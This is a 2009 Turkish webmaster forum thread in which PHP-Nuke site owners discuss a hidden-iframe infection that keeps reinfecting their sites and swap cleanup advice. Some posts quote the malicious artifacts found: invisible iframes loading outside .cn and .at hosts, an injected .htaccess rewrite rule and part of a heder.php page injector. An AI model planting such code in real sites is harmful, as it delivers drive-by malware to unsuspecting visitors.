Önceki başlık :: Sonraki başlık |
Yazar |
Mesaj |
mersoy Mesaj: 1000+
Kayıt: Dec 08, 2007 Mesajlar: 2316
|
Tarih: 2009-06-18, 12:15:49 Mesaj konusu: Yeni i f r a m e virüsler kodlarıda siliyor |
|
|
Yeni diyorum ama belkide ben yeni gördüm ve bir kaç gündür uğraştığım bir sorun.
Daha önce bulaşan i f r a m e virüsleri bul / değiştir program yardımları ile sistemden temizlemek kıolay oluyordu.
Bu seferki virüs daha iyi yazılmış. Bulaştığı index.php ve index.html gibi dosyaların ?> php kapama tagından önceki bir kaç satır kodu siliyor. Bu nedenle i f r a m e kodları temizlemek bir işie yaramıyor çünkü diğer kodlarımızda silinmiş olduğundan tüm dosyalar hatalı oluyor.
Yedeğimde olmadı için tek tek düzeltsemde bir yerlerde gizli olan kod ya da dosya sayesinde tekrar bulaşıyor (öyle tahmin ediyorum).
Diğer sitenin yedeği olduğu için kolay yırttım ama bu sefer faka bastık :S |
|
Başa dön |
|
|
Bu Site Google Adsense ile Gelir Elde Ediyor
|
Tarih: 2024-11-21, 14:04:09 Mesaj konusu: Forum Arası Reklamlar |
|
|
|
|
Başa dön |
|
|
muhammed-fatih Mesaj: 200+
Kayıt: Nov 24, 2008 Mesajlar: 298
|
Tarih: 2009-06-18, 12:22:33 Mesaj konusu: |
|
|
evet bir siteyi altı defa sildim tekrar kurdum yinede i f r a m e kodundan kurtulamadım index.html veya ıvır zıvır gibi dosyalara bulaşmıştı
genelde mainfile.php de ?> tagından sonra kendini atıyor headerin üstünde banner kadar alan açıyor asp yada php olarak fark etmiyor bir defa bilgisayarıma bulaşmış ftp den dosya yüklediğim bütün sitelere bulaşmış bir kaç defa buldum sildim ama fayda etmedi bilgisayara format atttım fdiks çaktim şimdi tekrar deneyecem eyer yine olmazsa bi daha hiçbir siteye el sürmeyecem
bilgisayara format attım fdiks çektim yedekleri harici hdd ye aldım ve harici hdd yi siteler bitene kadar kullanmayacam :)
sql yi indirdim ama ne gariptirki içerisinde bu kodla karşılaştım
[code]<i f r a m e src="http://mixgrouptravel.cn:8080/index.php" width=193 height=183 style="visibility: hidden"></i f r a m e># ========================================================[quote] |
|
Başa dön |
|
|
dmg Mesaj: 50+
Kayıt: Apr 13, 2007 Mesajlar: 50
|
Tarih: 2009-06-18, 13:12:52 Mesaj konusu: |
|
|
evet bu i f r a m e virüsleri çok tehlikeli gecenyıl bende karşılaştım, eski bir yedekle halletim, fakat şuan 2 arkadaşım var halen sitelerinde aylardır uğraşıyorlar bu durumla,
inşallah bi daha benim başıma gelmez |
|
Başa dön |
|
|
karaca25 Mesaj: 500+
Kayıt: Oct 02, 2007 Mesajlar: 717
|
Tarih: 2009-06-18, 14:25:39 Mesaj konusu: |
|
|
aynı durum benimde başıma geldi avast sayesinde temizleyebilmiştim..ancak tek bir dosyada bile kalsa 2 saat içinde tamamen kaynıyor.Host şirketi sayesinde siteyi eski bir tarihe almıştım.. |
|
Başa dön |
|
|
emrahtavsan Mesaj: 100+
Kayıt: Sep 19, 2007 Mesajlar: 141
|
Tarih: 2009-06-18, 17:35:54 Mesaj konusu: |
|
|
bunların bulaşmaması için neler yapılabilir ? |
|
Başa dön |
|
|
muhsin Mesaj: 100+
Kayıt: Oct 10, 2005 Mesajlar: 110 Konum: bayburt
|
Tarih: 2009-06-18, 17:52:47 Mesaj konusu: |
|
|
Öncelikle siztenizin yedeğini bilgisayarınıza alın, sonra komple FTP de bulunan dosyalarınızı silin, hangi nuke sürümünü kullanıyorsanız, hostunuza gönderin.
Php nuke de olmayan ve kendi bilgisayarınıza indirdiğiniz yedeğin içinde bulunan modülleri blokları vs. vs. onları tek tek temizleyin ve hostunuza gönderin. Ama bitmedi.
cpanel ve ftp şifrelerinizi değiştirin
Prefix değiştirin
admin ve config dosyalarınızı gizleyin.
Sorunu aşmış olursunuz % 99 sonuş alırsınız |
|
Başa dön |
|
|
karaca25 Mesaj: 500+
Kayıt: Oct 02, 2007 Mesajlar: 717
|
Tarih: 2009-06-18, 19:02:06 Mesaj konusu: |
|
|
ben güvenlik sistemlerini kullanmama rağmen yinede bulaşmıştı..en sağlamı yedek almak ve sağlam bir antivirüs kullanmak gibi geliyor.. |
|
Başa dön |
|
|
bybedircan Mesaj: 300+
Kayıt: Oct 11, 2007 Mesajlar: 320 Konum: Mersin Adana
|
Tarih: 2009-06-18, 20:21:02 Mesaj konusu: |
|
|
Kardeş en sağlamı yedeklerini alacaksın |
|
Başa dön |
|
|
Bu Site Google Adsense ile Gelir Elde Ediyor
|
Tarih: 2024-11-21, 14:04:09 Mesaj konusu: Forum Arası Reklamlar |
|
|
|
|
Başa dön |
|
|
muhammed-fatih Mesaj: 200+
Kayıt: Nov 24, 2008 Mesajlar: 298
|
Tarih: 2009-06-18, 20:42:26 Mesaj konusu: |
|
|
Öylede ama bu virüslerin nasıl bulaştığını anlatabilecek bir arkadaş varmı en iyi hangi program yakalayabilir. nasıl bulaşır bilgisayarda kendini gizleyebilirmi ben mesela sadece bir dosya attım ftp ye ama 2 saat sonra baktım virüs bulaşmış bile acaba bilgisayardanmı bulaşıyor yada nasıl nerden bulaşıyor nasıl çoğalıyor diyorsunuzki ftp ve panel şifrelerinizi değişrin neden değişmeliyiz bu konuda daha ayrıntılı bir bilgi veren olabilirmi acaba ?
defalarca virüslü görünen siteyi indirdim değişik programlarla tarattım ama birşey bulamadım ...
lütfen bilgi olan paylaşabilirmi kolay gelsin |
|
Başa dön |
|
|
bybedircan Mesaj: 300+
Kayıt: Oct 11, 2007 Mesajlar: 320 Konum: Mersin Adana
|
Tarih: 2009-06-18, 20:51:12 Mesaj konusu: |
|
|
bulaşması genelikle, ftp atığımız ,yeni modül, block ve tema gibi dosyaların arasında , tabi onu taratmamız lazım, ve tabi sitede ki açıklıktan da bulaşır, yani zaten birinci sitem öyle mavf olmuştur, ben silmekten bıkmıştım o bıkamadı en sonunda ben pes ettim |
|
Başa dön |
|
|
muhammed-fatih Mesaj: 200+
Kayıt: Nov 24, 2008 Mesajlar: 298
|
Tarih: 2009-06-18, 21:53:10 Mesaj konusu: |
|
|
valla bilmem pesmi etmek gerekir yada çabalamakmı gerekir ama ben artık phpnuke kullanamıyom kuruyorum aradan iki saat geçiyor birde bakıyom ne yukarda virüs var konuya çare bulmak gerekiyor bence hatta ilk önce burdan indirdiğim dosyalardan şüphelendim acaba burdaki dosyalardamı var diye daha sonra öteki arakdaşların başınada geldiğini öğrenince sorunun kendimden olduğunu anladım ben tarattım nod32 ile ad aware se ile bir kaçtanede başka bulduğum programla ama birşey çıkmadı hele bakayım siteyi tekrar kurdum bir çözüm bulamazsam uğraşmayacam daha 2 satırlık kodla adamlar siteyi mahvediyorlar valla bilsem bu kodlar kimin hiç düşünmeden mahkemeye verirdim
neyse çözüm bulanınız olursa burdan yazabilirmi
kolay gelsin |
|
Başa dön |
|
|
Style_53 Mesaj: 300+
Kayıt: Nov 10, 2006 Mesajlar: 441 Konum: Rize
|
Tarih: 2009-06-18, 22:41:01 Mesaj konusu: |
|
|
Arkadaşlar Sitenizin Muhakkak Bir Yedeğini Alın ve Rarlayıp Üstüne Birde rarladığınız Yedeğinize Şifre Koyup Cd Aktarın ve Saklayın. Allah Korusun O Virüsler Ftp Yoluyla Bilgisayarınıza Ulaşıp Tüm Yedeklerinize Bulaşabiliyor. Nitekim benim başıma Gelmişti. |
|
Başa dön |
|
|
Sercan Mesaj: 1000+
Kayıt: Jan 07, 2006 Mesajlar: 1719 Konum: İstanbuL //
|
Tarih: 2009-06-19, 02:13:35 Mesaj konusu: |
|
|
bana göre en dandik anti virüslerden biri avast çünkü herşeye virüs diyor :) Doğal olarak bu virüsü tek tanımlayan antivirüs programıdır.Şurada* yazdığım yazıda bu virüsten nasıl kurtulduğumu detaylı detaylı anlattım.Kısaca özet geçmek gerekirse i f r a m e olarak temizlemenin yanında %90 <? başlangıç kodunun bitişiğinde şifrelenmiş bir virüs eklenmiştir bunuda temizlemeniz gerekir.Ayrıca klasörlere images.php adında bir php dosyası atıp şifrelenmiş kodlarla bu dosyayı include ediyor ve virüsü temizlenmesi zor bir hale getiriyor. |
|
Başa dön |
|
|
mersoy Mesaj: 1000+
Kayıt: Dec 08, 2007 Mesajlar: 2316
|
Tarih: 2009-06-19, 08:32:21 Mesaj konusu: |
|
|
sizler yazdıklarımı tam anlayamadınız sanırım
Eğerki dosyaların belirli yerlerine virüs kodları bulaşmış olsaydı bunları temizlemek çok kolay olurdu.
Ben diyorumki index.* dosyalarının atıyorum alttan kod olan 5 satırını silmiş
bu durumda hiç bir şekilde temizleyemeyiz, sadece yedek atarak kurtarabiliriz. Ya da tüm virüs bulaşan dosyaları açıp temiz dosyalar ile karşılaştırıp silinen kodları eklemeliyiz. |
|
Başa dön |
|
|
karaca25 Mesaj: 500+
Kayıt: Oct 02, 2007 Mesajlar: 717
|
Tarih: 2009-06-19, 13:48:58 Mesaj konusu: |
|
|
en sağlıklısı 2 ayda bir ftp deki tüm dosyaları bir cd ye kopyalamak.biraz sıkıcı bir iş ama gerekli olanda bu |
|
Başa dön |
|
|
bybedircan Mesaj: 300+
Kayıt: Oct 11, 2007 Mesajlar: 320 Konum: Mersin Adana
|
Tarih: 2009-06-19, 14:33:08 Mesaj konusu: |
|
|
Anladık mersoy bey, bizde dedik tek çare, sürekli yeteklerimizi bulundurtmak |
|
Başa dön |
|
|
Diyar36 Mesaj: 200+
Kayıt: Jan 03, 2005 Mesajlar: 283
|
Tarih: 2009-06-19, 16:58:08 Mesaj konusu: |
|
|
ilk defa karsilasiyoruz böyle birseyle bizden yok ama görundugu gini yapan yapmis bu virusu |
|
Başa dön |
|
|
rache Mesaj: 100+
Kayıt: Sep 30, 2007 Mesajlar: 108 Konum: Avusturya
|
Tarih: 2009-06-19, 21:08:53 Mesaj konusu: |
|
|
Asagidaki i f r a m e benim mainfile.php den cikti..orjinal mainfile.php 2905 satir..Bu i f r a m e 2473. satirdan sonrasini silmis..Aradaki fark 432 satir.......Ve bu i f r a m e diger index.php ve html uzantili dosyalarin hepsinde yerlesmis durmda...Yedeklerle isi yirttim ...
Kod:
|
<i f r a m e src="http://namegamestore.cn:8080/index.php" width=188 height=123 style="visibility: hidden"></i f r a m e>
|
|
|
Başa dön |
|
|
mekansizim Mesaj: 200+
Kayıt: May 31, 2006 Mesajlar: 280
|
Tarih: 2009-06-21, 00:48:07 Mesaj konusu: |
|
|
buna çare bulan varmı ? |
|
Başa dön |
|
|
mersoy Mesaj: 1000+
Kayıt: Dec 08, 2007 Mesajlar: 2316
|
Tarih: 2009-06-21, 00:55:34 Mesaj konusu: |
|
|
mekansizim :
|
buna çare bulan varmı ?
|
malesef ben bulamadım
2 haftalık wordpress düzenlemelerim heba oldu
mecburen en sağlam nuke yedeğime geri dönmek zorunda kaldım
buda bana ders oldu, bundan sonra sürekli yedek alırım artık :) |
|
Başa dön |
|
|
mekansizim Mesaj: 200+
Kayıt: May 31, 2006 Mesajlar: 280
|
Tarih: 2009-06-21, 01:40:17 Mesaj konusu: |
|
|
aynı bela benimde başıma geldi nerden geldi nasıl girdi anlamadım.
bir tane var .htc dosyasından atıyor birtanede sayılı php dosyası atıyor bi i f r a m e kodu var yerleşiyor kendinden öncesini siliyor. index home gibi dizinlere yapışıyor |
|
Başa dön |
|
|
doktoradil Mesaj: 1+
Kayıt: Mar 19, 2005 Mesajlar: 33 Konum: ankara
|
Tarih: 2009-08-22, 15:54:17 Mesaj konusu: i f r a m e irus |
|
|
Merhaba arkadaşlar
2 haftadır i f r a m e ile boğuşuyorum. dediğiniz gibi siliyorum 2 saat sonra her şey yeni baştan.Şimdi farklı bir yöntem uygulamay çalışıyorum. umarım başarırım.
1.önce bilgisayarımı formatladım. ftp olarak filezilla yı kurdum
2. virus programı olarak avast prof kurdum
3. advanced find ve replaace programını kurdum
Siteyi bir flash diske indirdim. zaten avast bir çok dosyada i f r a m e alarmı verdi onları sildim.sonra advanced find and replace ile flash diski taradım içinde i f r a m e kelimesi olan dosyaları ve kodlaraı buldum. normal kodlara dokunmadım ama diğerlerini yani virus olanları sildim. ama problem dediğiniz gibi dosyanın altına değil bir kısmı silip ekliyor. bu nedenle bir çok dosyada sorun çıktı.
Sitede 2 değişik şey gördüm
1. rot ta .htaccess dosyasının içine şu kod eklenmiş:
#mmmd
<IfModule>
RewriteEngine On
RewriteCond %{REQUEST_FILENAME} -f
RewriteCond %{REQUEST_FILENAME} !.heder.php
RewriteRule (.*)\.(php|html|htm|php3|phtml|shtml) \.heder.php?q=$1.$2 [NC,L]
</IfModule>
2. rot a heder.php diye bir dosya eklemiş. içindeki kod:
</s> 0)
return preg_replace("/(<body>)/i", "\\1".$frame_code, $data, 1);
else return $data.$frame_code;
}
ob_start('callback');
$file = $_GET['q'];
chdir(get_file_dir_($file));
include($file);
?>
Bence bu sadece bir virusun yaptığı şey değil gibi.
Ayrıca sadece index.php ve index.html değil bir çok dosya ya eklemiş kodu. eklediği kod:
<i f r a m e src="http://c9u.at:8080/ts/in.cgi?pepsi148" width=125 height=125 style="visibility: hidden"></i f r a m e>
Kısacası saçımı başımı yolar hale geldim. Farklı bir yöntem uygulamam gerekiyorsa lütfen yardımcı olun.
Teşekkürler |
|
Başa dön |
|
|
emrahtavsan Mesaj: 100+
Kayıt: Sep 19, 2007 Mesajlar: 141
|
Tarih: 2009-08-22, 16:58:10 Mesaj konusu: |
|
|
arkadaslar ben temizledim
Şunları uyguladım:
1- Bilgisayarımı Formatladım c-d-e-f kısacası tüm hdd yi sildim
2- Kurulum tamamlandıktan sora ilk işim nod 32 ve avats prof kurdum
3- filezilla kurdum ve ftp ye den dosyaları çektim temizledim
4- temiz dosyaları ftp ye yüklemeden önce ftp ve panel şifrelerini degiştirdim
5- yeni kullanıcı adı ve şifremle ftp ye temiz dosyaları yükledim ve sorunsuz çalışıyor :) tabi silinen kodların telefisini yaptıktan sora sorunsuz...
Not: fotmat attıktan sora kesinlikle sitenize girmeyin virüs tekrar bulaşabilir. temiz dosyları yükledikten sonra sitenizi kontrol edebilirsiniz... virüs kodu içindeki http://9uc. cn/8080 gibi site adreslerini exporlerden yasaklayınki o siteye erişim olmasın ve virüs tekrar bulaşamasın
Kolay Gelsin .... |
|
Başa dön |
|
|
medo03 Mesaj: 300+
Kayıt: Nov 14, 2008 Mesajlar: 374 Konum: Afyonkarahisar
|
Tarih: 2009-08-22, 23:51:38 Mesaj konusu: |
|
|
Bu virüsler hakkaten acayip valla benim 3 siteye bulaştı hala uğraşıyorum bitiremedim nasıl bulaştı anlamadım pc yi yeni formatlamıştım ve kaspersky kullanıyodum nasıl bulaştı hala anlamış değilim :S:S:S |
|
Başa dön |
|
|
|